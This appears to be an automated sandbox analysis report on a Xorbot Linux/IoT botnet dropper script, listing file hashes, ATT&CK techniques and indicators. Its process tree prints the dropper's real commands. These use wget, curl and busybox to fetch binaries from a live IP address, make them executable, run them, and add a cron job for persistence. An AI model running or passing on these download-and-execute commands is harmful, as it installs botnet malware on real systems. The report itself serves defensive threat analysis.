xorbot | 45d09d0767324420fd07d1d53b288256fb241f615992e63afb8fcf7a3a320c17

Analysis

max time kernel
149s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
29-11-2024 22:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

661933a74eaf8348108fc0f2ea76e8b3
SHA1

777f720712e261d7fc20132401f8255a95076c95
SHA256

45d09d0767324420fd07d1d53b288256fb241f615992e63afb8fcf7a3a320c17
SHA512

1c83e72930244bcc34ecc50143ff5a9f6e9aaacf683554e0439d75b652ba27d8d3edbf03578aa8ed267c31bc65c34209a9df6f859f55e3f87318fd1695cdf3fb
SSDEEP

96:Cllja2/4rEpnh9Fe+ZlxEQmIHWPaT8Mf6P2RXllja2SnrMnftg+h9Fe+aylxEmQj:aP9h9Fe+HmIHWPAyPIh9Fe+e

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 2 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral1/files/fstream-1.dat	family_xorbot
behavioral1/files/fstream-3.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmod

pid	Process
1522	chmod
1529	chmod

Executes dropped EXE 2 IoCs

Processes:

T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHKAXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5

ioc	pid	Process
/tmp/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK	1523	T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
/tmp/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5	1530	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5

Renames itself 1 IoCs

Processes:

AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5

pid	Process
1531	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.XC2ndX	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5

description	ioc	Process
File opened for reading	/proc/420/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1175/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1644/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/35/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/36/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1587/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1597/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/2/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/24/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1132/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1609/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1617/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/26/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/154/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1560/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1639/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/554/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1483/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1636/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1640/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/19/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1502/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1275/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1536/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1538/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/18/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/981/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1563/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1565/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1612/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1632/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1100/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1196/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/4/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1604/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1341/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1641/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1172/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1179/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1611/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/5/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/476/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1199/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/198/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/490/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1298/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1570/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1584/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1629/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/674/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1190/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1263/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1571/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1580/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1589/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/115/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/550/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/28/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/527/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1509/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/14/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/27/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1077/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
File opened for reading	/proc/1572/cmdline	AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusyboxwgetcurlbusybox

description	ioc	Process
File opened for modification	/tmp/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK	wget
File opened for modification	/tmp/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK	curl
File opened for modification	/tmp/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK	busybox
File opened for modification	/tmp/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5	wget
File opened for modification	/tmp/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5	curl
File opened for modification	/tmp/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:1506
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1507
- /usr/bin/wget
  wget http://216.126.231.240/bins/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
  2⤵
  - Writes file to tmp directory
  PID:1508
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
  2⤵
  - Writes file to tmp directory
  PID:1521
- /bin/chmod
  chmod 777 T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
  2⤵
  - File and Directory Permissions Modification
  PID:1522
- /tmp/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
  ./T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
  2⤵
  - Executes dropped EXE
  PID:1523
- /bin/rm
  rm T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK
  2⤵
  PID:1525
- /usr/bin/wget
  wget http://216.126.231.240/bins/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
  2⤵
  - Writes file to tmp directory
  PID:1526
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
  2⤵
  - Writes file to tmp directory
  PID:1527
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/chmod
  chmod 777 AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
  ./AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:1530
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:1532
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1533
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:1534
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1535
- /bin/rm
  rm AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5
  2⤵
  PID:1537
- /usr/bin/wget
  wget http://216.126.231.240/bins/ZW6IYCvfeHSTwuBFGCHsb9psFBEXoAj3Zj
  2⤵
  PID:1540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/AXsHqfBsZSjFabdFxzIFyvmX5P8O4kMHr5

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/tmp/T3FvpR0lQo1zPtWdJ3jVbeXoRWRvyi3JHK

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/var/spool/cron/crontabs/tmp.XC2ndX

Filesize
210B

MD5
b2e01d1e6e4b609f8ab8e807a844b137

SHA1
d3228996eabf9950ae283cfb8e7e260cafa735fe

SHA256
b4d381e2ca7e46c3693a4ae3d68eeb69480e191801b5af8875a57952eeba2b4d

SHA512
5e39018cf21b5823799ab286fbf56ccc96b3bc6dd9cda2d07c0bbd7b94aee75330d2850395b09d625a0029f0a284a5534f1f01e24d0683d68052948af544e3fb

Download Submit